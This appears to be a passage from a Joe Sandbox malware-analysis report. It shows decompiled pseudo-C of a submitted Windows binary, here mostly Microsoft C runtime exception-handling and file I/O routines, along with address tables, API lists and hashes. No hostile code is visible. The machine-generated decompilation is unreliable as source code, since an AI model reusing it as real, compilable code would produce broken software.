                                                									if(( *_t220 & 0x00000040) == 0) {
                                                										_push(0);
                                                										_push(1);
                                                										E001ACC68(_t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                                                										_t298 = _v12;
                                                										_t334 = _t334 + 0x30;
                                                									}
                                                									goto L83;
                                                								}
                                                								__eflags =  *((char*)(_t283 + 8));
                                                								if( *((char*)(_t283 + 8)) != 0) {
                                                									goto L83;
                                                								}
                                                								goto L81;
                                                								L83:
                                                								_t298 = _t298 + 1;
                                                								_t214 = _v20;
                                                								_t277 = _v16 + 0x14;
                                                								_v12 = _t298;
                                                								_v16 = _t277;
                                                								__eflags = _t298 - _v32;
                                                							} while (_t298 < _v32);
                                                							goto L84;
                                                						}
                                                						E001B2DB9(_t271, _t275, _t296, _t315);
                                                						asm("int3");
                                                						_push(_t329);
                                                						_t297 = _v184;
                                                						_push(_t271);
                                                						_push(_t315);
                                                						_push(0);
                                                						_t205 = _t297[4];
                                                						__eflags = _t205;
                                                						if(_t205 == 0) {
                                                							L109:
                                                							_t207 = 1;
                                                							__eflags = 1;
                                                						} else {
                                                							_t276 = _t205 + 8;
                                                							__eflags =  *_t276;
                                                							if( *_t276 == 0) {
                                                								goto L109;
                                                							} else {
                                                								__eflags =  *_t297 & 0x00000080;
                                                								_t304 = _v0;
                                                								if(( *_t297 & 0x00000080) == 0) {
                                                									L91:
                                                									_t272 = _t304[4];
                                                									_t317 = 0;
                                                									__eflags = _t205 - _t272;
                                                									if(_t205 == _t272) {
                                                										L101:
                                                										__eflags =  *_t304 & 0x00000002;
                                                										if(( *_t304 & 0x00000002) == 0) {
                                                											L103:
                                                											_t208 = _a4;
                                                											__eflags =  *_t208 & 0x00000001;
                                                											if(( *_t208 & 0x00000001) == 0) {
                                                												L105:
                                                												__eflags =  *_t208 & 0x00000002;
                                                												if(( *_t208 & 0x00000002) == 0) {
                                                													L107:
                                                													_t317 = 1;
                                                													__eflags = 1;
                                                												} else {
                                                													__eflags =  *_t297 & 0x00000002;
                                                													if(( *_t297 & 0x00000002) != 0) {
                                                														goto L107;
                                                													}
                                                												}
                                                											} else {
                                                												__eflags =  *_t297 & 0x00000001;
                                                												if(( *_t297 & 0x00000001) != 0) {
                                                													goto L105;
                                                												}
                                                											}
                                                										} else {
                                                											__eflags =  *_t297 & 0x00000008;
                                                											if(( *_t297 & 0x00000008) != 0) {
                                                												goto L103;
                                                											}
                                                										}
                                                										_t207 = _t317;
                                                									} else {
                                                										_t209 = _t272 + 8;
                                                										while(1) {
                                                											_t273 =  *_t276;
                                                											__eflags = _t273 -  *_t209;
                                                											if(_t273 !=  *_t209) {
                                                												break;
                                                											}
                                                											__eflags = _t273;
                                                											if(_t273 == 0) {
                                                												L97:
                                                												_t210 = _t317;
                                                											} else {
                                                												_t274 =  *((intOrPtr*)(_t276 + 1));
                                                												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                                                												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                                                													break;
                                                												} else {
                                                													_t276 = _t276 + 2;
                                                													_t209 = _t209 + 2;
                                                													__eflags = _t274;
                                                													if(_t274 != 0) {
                                                														continue;
                                                													} else {
                                                														goto L97;
                                                													}
                                                												}
                                                											}
                                                											L99:
                                                											__eflags = _t210;
                                                											if(_t210 == 0) {
                                                												goto L101;
                                                											} else {
                                                												_t207 = 0;
                                                											}
                                                											goto L110;
                                                										}
                                                										asm("sbb eax, eax");
                                                										_t210 = _t209 | 0x00000001;
                                                										__eflags = _t210;
                                                										goto L99;
                                                									}
                                                								} else {
                                                									__eflags =  *_t304 & 0x00000010;
                                                									if(( *_t304 & 0x00000010) != 0) {
                                                										goto L109;
                                                									} else {
                                                										goto L91;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						L110:
                                                						return _t207;
                                                					}
                                                				} else {
                                                					_t270 = _a4;
                                                					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                						L22:
                                                						_t296 = _a12;
                                                						_v8 = _t296;
                                                						goto L24;
                                                					} else {
                                                						_t315 = 0;
                                                						if(_t270[0x1c] != 0) {
                                                							goto L22;
                                                						} else {
                                                							_t224 = E001AC96C(_t270, _t275, _t296, 0);
                                                							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                                                								L61:
                                                								return _t224;
                                                							} else {
                                                								_t270 =  *(E001AC96C(_t270, _t275, _t296, 0) + 0x10);
                                                								_t259 = E001AC96C(_t270, _t275, _t296, 0);
                                                								_v28 = 1;
                                                								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                                                								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                                                									goto L67;
                                                								} else {
                                                									if( *((intOrPtr*)(E001AC96C(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                                                										L23:
                                                										_t296 = _v8;
                                                										_t275 = _v12;
                                                										L24:
                                                										_v52 = _t301;
                                                										_v48 = 0;
                                                										__eflags =  *_t270 - 0xe06d7363;
                                                										if( *_t270 != 0xe06d7363) {
                                                											L57:
                                                											__eflags = _t301[3];
                                                											if(_t301[3] <= 0) {
                                                												goto L60;
                                                											} else {
                                                												__eflags = _a24;
                                                												if(_a24 != 0) {
                                                													goto L67;
                                                												} else {
                                                													_push(_a32);
                                                													_push(_a28);
                                                													_push(_t275);
                                                													_push(_t301);
                                                													_push(_a16);
                                                													_push(_t296);
                                                													_push(_a8);
                                                													_push(_t270);
                                                													L68();
                                                													_t332 = _t332 + 0x20;
                                                													goto L60;
                                                												}
                                                											}
                                                										} else {
                                                											__eflags = _t270[0x10] - 3;
                                                											if(_t270[0x10] != 3) {
                                                												goto L57;
                                                											} else {
                                                												__eflags = _t270[0x14] - 0x19930520;
                                                												if(_t270[0x14] == 0x19930520) {
                                                													L29:
                                                													_t315 = _a32;
                                                													__eflags = _t301[3];
                                                													if(_t301[3] > 0) {
                                                														_push(_a28);
                                                														E001AA44C(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                                                														_t296 = _v64;
                                                														_t332 = _t332 + 0x18;
                                                														_t247 = _v68;
                                                														_v44 = _t247;
                                                														_v16 = _t296;
                                                														__eflags = _t296 - _v56;
                                                														if(_t296 < _v56) {
                                                															_t290 = _t296 * 0x14;
                                                															__eflags = _t290;
                                                															_v32 = _t290;
                                                															do {
                                                																_t291 = 5;
                                                																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                                                																_t332 = _t332 + 0xc;
                                                																__eflags = _v104 - _t250;
                                                																if(_v104 <= _t250) {
                                                																	__eflags = _t250 - _v100;
                                                																	if(_t250 <= _v100) {
                                                																		_t294 = 0;
                                                																		_v20 = 0;
                                                																		__eflags = _v92;
                                                																		if(_v92 != 0) {
                                                																			_t299 = _t270[0x1c];
                                                																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                                                																			_t252 = _t251 + 4;
                                                																			__eflags = _t252;
                                                																			_v36 = _t252;
                                                																			_t253 = _v88;
                                                																			_v40 =  *_t251;
                                                																			_v24 = _t253;
                                                																			do {
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				_t327 = _v40;
                                                																				_t314 = _v36;
                                                																				__eflags = _t327;
                                                																				if(_t327 <= 0) {
                                                																					goto L40;
                                                																				} else {
                                                																					while(1) {
                                                																						_push(_t299);
                                                																						_push( *_t314);
                                                																						_t254 =  &_v84;
                                                																						_push(_t254);
                                                																						L87();
                                                																						_t332 = _t332 + 0xc;
                                                																						__eflags = _t254;
                                                																						if(_t254 != 0) {
                                                																							break;
                                                																						}
                                                																						_t299 = _t270[0x1c];
                                                																						_t327 = _t327 - 1;
                                                																						_t314 = _t314 + 4;
                                                																						__eflags = _t327;
                                                																						if(_t327 > 0) {
                                                																							continue;
                                                																						} else {
                                                																							_t294 = _v20;
                                                																							_t253 = _v24;
                                                																							goto L40;
                                                																						}
                                                																						goto L43;
                                                																					}
                                                																					_push(_a24);
                                                																					_push(_v28);
                                                																					E001ACC68(_t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                                                																					_t332 = _t332 + 0x30;
                                                																				}
                                                																				L43:
                                                																				_t296 = _v16;
                                                																				goto L44;
                                                																				L40:
                                                																				_t294 = _t294 + 1;
                                                																				_t253 = _t253 + 0x10;
                                                																				_v20 = _t294;
                                                																				_v24 = _t253;
                                                																				__eflags = _t294 - _v92;
                                                																			} while (_t294 != _v92);
                                                																			goto L43;
                                                																		}
                                                																	}
                                                																}
                                                																L44:
                                                																_t296 = _t296 + 1;
                                                																_t247 = _v44;
                                                																_t290 = _v32 + 0x14;
                                                																_v16 = _t296;
                                                																_v32 = _t290;
                                                																__eflags = _t296 - _v56;
                                                															} while (_t296 < _v56);
                                                															_t301 = _a20;
                                                															_t315 = _a32;
                                                														}
                                                													}
                                                													__eflags = _a24;
                                                													if(__eflags != 0) {
                                                														_push(1);
                                                														E001AAD98(_t270, _t301, _t315, __eflags);
                                                														_t275 = _t270;
                                                													}
                                                													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                                                													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                                                														L60:
                                                														_t224 = E001AC96C(_t270, _t275, _t296, _t315);
                                                														__eflags =  *(_t224 + 0x1c);
                                                														if( *(_t224 + 0x1c) != 0) {
                                                															goto L67;
                                                														} else {
                                                															goto L61;
                                                														}
                                                													} else {
                                                														_t228 = _t301[8] >> 2;
                                                														__eflags = _t301[7];
                                                														if(_t301[7] != 0) {
                                                															__eflags = _t228 & 0x00000001;
                                                															if((_t228 & 0x00000001) == 0) {
                                                																_push(_t301[7]);
                                                																_t229 = E001AD706(_t270, _t301, _t315, _t270);
                                                																_pop(_t275);
                                                																__eflags = _t229;
                                                																if(_t229 == 0) {
                                                																	goto L64;
                                                																} else {
                                                																	goto L60;
                                                																}
                                                															} else {
                                                																goto L54;
                                                															}
                                                														} else {
                                                															__eflags = _t228 & 0x00000001;
                                                															if((_t228 & 0x00000001) == 0) {
                                                																goto L60;
                                                															} else {
                                                																__eflags = _a28;
                                                																if(_a28 != 0) {
                                                																	goto L60;
                                                																} else {
                                                																	L54:
                                                																	 *(E001AC96C(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                																	_t237 = E001AC96C(_t270, _t275, _t296, _t315);
                                                																	_t286 = _v8;
                                                																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                                                																	goto L62;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													__eflags = _t270[0x14] - 0x19930521;
                                                													if(_t270[0x14] == 0x19930521) {
                                                														goto L29;
                                                													} else {
                                                														__eflags = _t270[0x14] - 0x19930522;
                                                														if(_t270[0x14] != 0x19930522) {
                                                															goto L57;
                                                														} else {
                                                															goto L29;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_v16 =  *((intOrPtr*)(E001AC96C(_t270, _t275, _t296, _t315) + 0x1c));
                                                										_t264 = E001AC96C(_t270, _t275, _t296, _t315);
                                                										_push(_v16);
                                                										 *(_t264 + 0x1c) = _t315;
                                                										_t265 = E001AD706(_t270, _t301, _t315, _t270);
                                                										_pop(_t286);
                                                										if(_t265 != 0) {
                                                											goto L23;
                                                										} else {
                                                											_t301 = _v16;
                                                											_t353 =  *_t301 - _t315;
                                                											if( *_t301 <= _t315) {
                                                												L62:
                                                												E001B5BFE(_t270, _t286, _t296, _t301, _t315, __eflags);
                                                											} else {
                                                												while(1) {
                                                													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                                                													if(E001AD38F( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x2020c8) != 0) {
                                                														goto L63;
                                                													}
                                                													_t315 = _t315 + 0x10;
                                                													_t269 = _v20 + 1;
                                                													_v20 = _t269;
                                                													_t353 = _t269 -  *_t301;
                                                													if(_t269 >=  *_t301) {
                                                														goto L62;
                                                													} else {
                                                														continue;
                                                													}
                                                													goto L63;
                                                												}
                                                											}
                                                											L63:
                                                											_push(1);
                                                											_push(_t270);
                                                											E001AAD98(_t270, _t301, _t315, __eflags);
                                                											_t275 =  &_v64;
                                                											E001AD377( &_v64);
                                                											E001AA3E0( &_v64, 0x1d3e94);
                                                											L64:
                                                											 *(E001AC96C(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                											_t231 = E001AC96C(_t270, _t275, _t296, _t315);
                                                											_t275 = _v8;
                                                											 *(_t231 + 0x14) = _v8;
                                                											__eflags = _t315;
                                                											if(_t315 == 0) {
                                                												_t315 = _a8;
                                                											}
                                                											E001AA63F(_t275, _t315, _t270);
                                                											E001AD606(_a8, _a16, _t301);
                                                											_t234 = E001AD7C3(_t301);
                                                											_t332 = _t332 + 0x10;
                                                											_push(_t234);
                                                											E001AD57D(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                											goto L67;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}






















































































                                                0x001acce8
                                                0x001accef
                                                0x001accf1
                                                0x001accfa
                                                0x001acd00
                                                0x001acd08
                                                0x001acd0a
                                                0x001acd0d
                                                0x001acd13
                                                0x001ad087
                                                0x001ad087
                                                0x001ad08c
                                                0x001ad08e
                                                0x001ad090
                                                0x001ad093
                                                0x001ad094
                                                0x001ad097
                                                0x001ad09d
                                                0x001ad1bc
                                                0x001ad0a3
                                                0x001ad0a5
                                                0x001ad0ac
                                                0x001ad0af
                                                0x001ad0b2
                                                0x001ad0b8
                                                0x001ad0ba
                                                0x001ad0bf
                                                0x001ad0c2
                                                0x001ad0c4
                                                0x001ad0ca
                                                0x001ad0cc
                                                0x001ad0d2
                                                0x001ad0e7
                                                0x001ad0ec
                                                0x001ad0ef
                                                0x001ad0f1
                                                0x001ad1b8
                                                0x00000000
                                                0x001ad1b9
                                                0x001ad0f1
                                                0x001ad0d2
                                                0x001ad0ca
                                                0x001ad0c2
                                                0x001ad0f7
                                                0x001ad0fa
                                                0x001ad0fd
                                                0x001ad100
                                                0x001ad103
                                                0x001ad109
                                                0x001ad11b
                                                0x001ad120
                                                0x001ad123
                                                0x001ad126
                                                0x001ad129
                                                0x001ad12c
                                                0x001ad12f
                                                0x001ad132
                                                0x00000000
                                                0x00000000
                                                0x001ad138
                                                0x001ad138
                                                0x001ad13b
                                                0x001ad13e
                                                0x001ad14d
                                                0x001ad14e
                                                0x001ad14e
                                                0x001ad150
                                                0x001ad153
                                                0x00000000
                                                0x00000000
                                                0x001ad155
                                                0x001ad158
                                                0x00000000
                                                0x00000000
                                                0x001ad166
                                                0x001ad168
                                                0x001ad16b
                                                0x001ad16d
                                                0x001ad175
                                                0x001ad175
                                                0x001ad178
                                                0x001ad17a
                                                0x001ad17c
                                                0x001ad198
                                                0x001ad19d
                                                0x001ad1a0
                                                0x001ad1a0
                                                0x00000000
                                                0x001ad178
                                                0x001ad16f
                                                0x001ad173
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ad1a3
                                                0x001ad1a6
                                                0x001ad1a7
                                                0x001ad1aa
                                                0x001ad1ad
                                                0x001ad1b0
                                                0x001ad1b3
                                                0x001ad1b3
                                                0x00000000
                                                0x001ad13e
                                                0x001ad1bd
                                                0x001ad1c2
                                                0x001ad1c3
                                                0x001ad1c6
                                                0x001ad1c9
                                                0x001ad1ca
                                                0x001ad1cb
                                                0x001ad1cc
                                                0x001ad1cf
                                                0x001ad1d1
                                                0x001ad249
                                                0x001ad24b
                                                0x001ad24b
                                                0x001ad1d3
                                                0x001ad1d3
                                                0x001ad1d6
                                                0x001ad1d9
                                                0x00000000
                                                0x001ad1db
                                                0x001ad1db
                                                0x001ad1de
                                                0x001ad1e1
                                                0x001ad1e8
                                                0x001ad1e8
                                                0x001ad1eb
                                                0x001ad1ed
                                                0x001ad1ef
                                                0x001ad221
                                                0x001ad221
                                                0x001ad224
                                                0x001ad22b
                                                0x001ad22b
                                                0x001ad22e
                                                0x001ad231
                                                0x001ad238
                                                0x001ad238
                                                0x001ad23b
                                                0x001ad242
                                                0x001ad244
                                                0x001ad244
                                                0x001ad23d
                                                0x001ad23d
                                                0x001ad240
                                                0x00000000
                                                0x00000000
                                                0x001ad240
                                                0x001ad233
                                                0x001ad233
                                                0x001ad236
                                                0x00000000
                                                0x00000000
                                                0x001ad236
                                                0x001ad226
                                                0x001ad226
                                                0x001ad229
                                                0x00000000
                                                0x00000000
                                                0x001ad229
                                                0x001ad245
                                                0x001ad1f1
                                                0x001ad1f1
                                                0x001ad1f4
                                                0x001ad1f4
                                                0x001ad1f6
                                                0x001ad1f8
                                                0x00000000
                                                0x00000000
                                                0x001ad1fa
                                                0x001ad1fc
                                                0x001ad210
                                                0x001ad210
                                                0x001ad1fe
                                                0x001ad1fe
                                                0x001ad201
                                                0x001ad204
                                                0x00000000
                                                0x001ad206
                                                0x001ad206
                                                0x001ad209
                                                0x001ad20c
                                                0x001ad20e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ad20e
                                                0x001ad204
                                                0x001ad219
                                                0x001ad219
                                                0x001ad21b
                                                0x00000000
                                                0x001ad21d
                                                0x001ad21d
                                                0x001ad21d
                                                0x00000000
                                                0x001ad21b
                                                0x001ad214
                                                0x001ad216
                                                0x001ad216
                                                0x00000000
                                                0x001ad216
                                                0x001ad1e3
                                                0x001ad1e3
                                                0x001ad1e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ad1e6
                                                0x001ad1e1
                                                0x001ad1d9
                                                0x001ad24c
                                                0x001ad250
                                                0x001ad250
                                                0x001acd22
                                                0x001acd22
                                                0x001acd2b
                                                0x001ace28
                                                0x001ace28
                                                0x001ace2b
                                                0x00000000
                                                0x001acd5a
                                                0x001acd5a
                                                0x001acd5f
                                                0x00000000
                                                0x001acd65
                                                0x001acd65
                                                0x001acd6d
                                                0x001ad021
                                                0x001ad025
                                                0x001acd73
                                                0x001acd78
                                                0x001acd7b
                                                0x001acd80
                                                0x001acd87
                                                0x001acd8c
                                                0x00000000
                                                0x001acdc4
                                                0x001acdcc
                                                0x001ace30
                                                0x001ace30
                                                0x001ace33
                                                0x001ace36
                                                0x001ace38
                                                0x001ace3b
                                                0x001ace3e
                                                0x001ace44
                                                0x001acff0
                                                0x001acff0
                                                0x001acff3
                                                0x00000000
                                                0x001acff5
                                                0x001acff5
                                                0x001acff8
                                                0x00000000
                                                0x001acffe
                                                0x001acffe
                                                0x001ad001
                                                0x001ad004
                                                0x001ad005
                                                0x001ad006
                                                0x001ad009
                                                0x001ad00a
                                                0x001ad00d
                                                0x001ad00e
                                                0x001ad013
                                                0x00000000
                                                0x001ad013
                                                0x001acff8
                                                0x001ace4a
                                                0x001ace4a
                                                0x001ace4e
                                                0x00000000
                                                0x001ace54
                                                0x001ace54
                                                0x001ace5b
                                                0x001ace73
                                                0x001ace73
                                                0x001ace76
                                                0x001ace79
                                                0x001ace7f
                                                0x001ace8f
                                                0x001ace94
                                                0x001ace97
                                                0x001ace9a
                                                0x001ace9d
                                                0x001acea0
                                                0x001acea3
                                                0x001acea6
                                                0x001aceac
                                                0x001aceac
                                                0x001aceaf
                                                0x001aceb2
                                                0x001acec1
                                                0x001acec2
                                                0x001acec2
                                                0x001acec4
                                                0x001acec7
                                                0x001acecd
                                                0x001aced0
                                                0x001aced6
                                                0x001aced8
                                                0x001acedb
                                                0x001acede
                                                0x001acee4
                                                0x001acee7
                                                0x001aceec
                                                0x001aceec
                                                0x001aceef
                                                0x001acef2
                                                0x001acef5
                                                0x001acef8
                                                0x001acefb
                                                0x001acf00
                                                0x001acf01
                                                0x001acf02
                                                0x001acf03
                                                0x001acf04
                                                0x001acf07
                                                0x001acf0a
                                                0x001acf0c
                                                0x00000000
                                                0x001acf0e
                                                0x001acf0e
                                                0x001acf0e
                                                0x001acf0f
                                                0x001acf11
                                                0x001acf14
                                                0x001acf15
                                                0x001acf1a
                                                0x001acf1d
                                                0x001acf1f
                                                0x00000000
                                                0x00000000
                                                0x001acf21
                                                0x001acf24
                                                0x001acf25
                                                0x001acf28
                                                0x001acf2a
                                                0x00000000
                                                0x001acf2c
                                                0x001acf2c
                                                0x001acf2f
                                                0x00000000
                                                0x001acf2f
                                                0x00000000
                                                0x001acf2a
                                                0x001acf43
                                                0x001acf49
                                                0x001acf66
                                                0x001acf6b
                                                0x001acf6b
                                                0x001acf6e
                                                0x001acf6e
                                                0x00000000
                                                0x001acf32
                                                0x001acf32
                                                0x001acf33
                                                0x001acf36
                                                0x001acf39
                                                0x001acf3c
                                                0x001acf3c
                                                0x00000000
                                                0x001acf41
                                                0x001acede
                                                0x001aced0
                                                0x001acf71
                                                0x001acf74
                                                0x001acf75
                                                0x001acf78
                                                0x001acf7b
                                                0x001acf7e
                                                0x001acf81
                                                0x001acf81
                                                0x001acf8a
                                                0x001acf8d
                                                0x001acf8d
                                                0x001acea6
                                                0x001acf90
                                                0x001acf94
                                                0x001acf96
                                                0x001acf99
                                                0x001acf9f
                                                0x001acf9f
                                                0x001acfa7
                                                0x001acfac
                                                0x001ad016
                                                0x001ad016
                                                0x001ad01b
                                                0x001ad01f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001acfae
                                                0x001acfb1
                                                0x001acfb4
                                                0x001acfb8
                                                0x001acfc6
                                                0x001acfc8
                                                0x001acfdf
                                                0x001acfe3
                                                0x001acfe9
                                                0x001acfea
                                                0x001acfec
                                                0x00000000
                                                0x001acfee
                                                0x00000000
                                                0x001acfee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001acfba
                                                0x001acfba
                                                0x001acfbc
                                                0x00000000
                                                0x001acfbe
                                                0x001acfbe
                                                0x001acfc2
                                                0x00000000
                                                0x001acfc4
                                                0x001acfca
                                                0x001acfcf
                                                0x001acfd2
                                                0x001acfd7
                                                0x001acfda
                                                0x00000000
                                                0x001acfda
                                                0x001acfc2
                                                0x001acfbc
                                                0x001acfb8
                                                0x001ace5d
                                                0x001ace5d
                                                0x001ace64
                                                0x00000000
                                                0x001ace66
                                                0x001ace66
                                                0x001ace6d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ace6d
                                                0x001ace64
                                                0x001ace5b
                                                0x001ace4e
                                                0x001acdce
                                                0x001acdd6
                                                0x001acdd9
                                                0x001acdde
                                                0x001acde2
                                                0x001acde5
                                                0x001acdeb
                                                0x001acdee
                                                0x00000000
                                                0x001acdf0
                                                0x001acdf0
                                                0x001acdf3
                                                0x001acdf5
                                                0x001ad026
                                                0x001ad026
                                                0x00000000
                                                0x001acdfb
                                                0x001ace03
                                                0x001ace0e
                                                0x00000000
                                                0x00000000
                                                0x001ace17
                                                0x001ace1a
                                                0x001ace1b
                                                0x001ace1e
                                                0x001ace20
                                                0x00000000
                                                0x001ace26
                                                0x00000000
                                                0x001ace26
                                                0x00000000
                                                0x001ace20
                                                0x001acdfb
                                                0x001ad02b
                                                0x001ad02b
                                                0x001ad02d
                                                0x001ad02e
                                                0x001ad035
                                                0x001ad038
                                                0x001ad046
                                                0x001ad04b
                                                0x001ad050
                                                0x001ad053
                                                0x001ad058
                                                0x001ad05b
                                                0x001ad05e
                                                0x001ad060
                                                0x001ad062
                                                0x001ad062
                                                0x001ad067
                                                0x001ad073
                                                0x001ad079
                                                0x001ad07e
                                                0x001ad081
                                                0x001ad082
                                                0x00000000
                                                0x001ad082
                                                0x001acdee
                                                0x001acdcc
                                                0x001acd8c
                                                0x001acd6d
                                                0x001acd5f
                                                0x001acd2b

                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 001ACE07
                                                • ___TypeMatch.LIBVCRUNTIME ref: 001ACF15
                                                • _UnwindNestedFrames.LIBCMT ref: 001AD067
                                                • CallUnexpected.LIBVCRUNTIME ref: 001AD082
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: 3eee744a64712a00752c6e36b4965c551958d36b7fa765049a49dd3d45b1fe68
                                                • Instruction ID: 9eb65c01efa8ac64f4c0b3ac1c3b32290c8bf04408b0c6e2dee615f32c79bf06
                                                • Opcode Fuzzy Hash: 3eee744a64712a00752c6e36b4965c551958d36b7fa765049a49dd3d45b1fe68
                                                • Instruction Fuzzy Hash: 72B19B79800609EFCF29DFA4D9819AEBBB5FF26310F14415AF8116B246D331DA51CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E001BBA6C(signed int _a4, void* _a8, unsigned int _a12) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				long _v24;
                                                				void* _v28;
                                                				char _v32;
                                                				void* _v36;
                                                				long _v40;
                                                				signed int* _t132;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				long _t138;
                                                				signed int _t141;
                                                				signed int _t143;
                                                				signed char _t145;
                                                				intOrPtr _t153;
                                                				long _t155;
                                                				signed int _t156;
                                                				signed int _t157;
                                                				signed int _t159;
                                                				long _t160;
                                                				intOrPtr _t165;
                                                				signed int _t166;
                                                				intOrPtr _t168;
                                                				signed int _t170;
                                                				signed int _t172;
                                                				char _t174;
                                                				char _t179;
                                                				char _t184;
                                                				signed char _t191;
                                                				long _t197;
                                                				signed int _t200;
                                                				intOrPtr _t203;
                                                				long _t204;
                                                				signed int _t205;
                                                				unsigned int _t208;
                                                				signed int _t210;
                                                				signed int _t216;
                                                				signed char _t217;
                                                				long _t218;
                                                				long _t219;
                                                				void* _t220;
                                                				signed int _t221;
                                                				char* _t223;
                                                				char* _t224;
                                                				char* _t225;
                                                				signed int _t230;
                                                				signed int _t231;
                                                				void* _t235;
                                                				void* _t237;
                                                				void* _t238;
                                                				void* _t239;
                                                
                                                				_t200 = _a4;
                                                				_t238 = _t237 - 0x24;
                                                				if(_t200 != 0xfffffffe) {
                                                					__eflags = _t200;
                                                					if(_t200 < 0) {
                                                						L60:
                                                						_t132 = E001AFF2E();
                                                						 *_t132 =  *_t132 & 0x00000000;
                                                						__eflags =  *_t132;
                                                						 *((intOrPtr*)(E001AFF41())) = 9;
                                                						L61:
                                                						_t134 = E001AFE43();
                                                						goto L62;
                                                					}
                                                					__eflags = _t200 -  *0x203378; // 0x40
                                                					if(__eflags >= 0) {
                                                						goto L60;
                                                					}
                                                					_t216 = _t200 >> 6;
                                                					_t230 = (_t200 & 0x0000003f) * 0x38;
                                                					_v12 = _t216;
                                                					_v32 = 1;
                                                					_t138 =  *((intOrPtr*)(0x203178 + _t216 * 4));
                                                					_v24 = _t138;
                                                					_v20 = _t230;
                                                					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
                                                					_v5 = _t217;
                                                					__eflags = 1 & _t217;
                                                					if((1 & _t217) == 0) {
                                                						goto L60;
                                                					}
                                                					_t218 = _a12;
                                                					__eflags = _t218 - 0x7fffffff;
                                                					if(_t218 <= 0x7fffffff) {
                                                						__eflags = _t218;
                                                						if(_t218 == 0) {
                                                							L59:
                                                							_t135 = 0;
                                                							goto L63;
                                                						}
                                                						__eflags = _v5 & 0x00000002;
                                                						if((_v5 & 0x00000002) != 0) {
                                                							goto L59;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							goto L6;
                                                						}
                                                						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
                                                						_v5 = _t141;
                                                						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
                                                						_t235 = 0;
                                                						_t143 = _t141 - 1;
                                                						__eflags = _t143;
                                                						if(_t143 == 0) {
                                                							_t145 =  !_t218;
                                                							__eflags = 1 & _t145;
                                                							if((1 & _t145) == 0) {
                                                								L14:
                                                								 *(E001AFF2E()) =  *_t146 & _t235;
                                                								 *((intOrPtr*)(E001AFF41())) = 0x16;
                                                								E001AFE43();
                                                								goto L40;
                                                							} else {
                                                								_t219 = _t218 >> 1;
                                                								_t197 = 4;
                                                								__eflags = _t219 - 1;
                                                								if(_t219 >= 1) {
                                                									_t197 = _t219;
                                                								}
                                                								_t235 = E001B6429(_t197);
                                                								E001B63EF(0);
                                                								E001B63EF(0);
                                                								_t239 = _t238 + 0xc;
                                                								_v16 = _t235;
                                                								__eflags = _t235;
                                                								if(_t235 != 0) {
                                                									_t153 = E001BB434(_t219, _a4, 0, 0, 1);
                                                									_t238 = _t239 + 0x10;
                                                									_t203 =  *((intOrPtr*)(0x203178 + _v12 * 4));
                                                									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
                                                									 *(_t230 + _t203 + 0x24) = _t219;
                                                									_t220 = _t235;
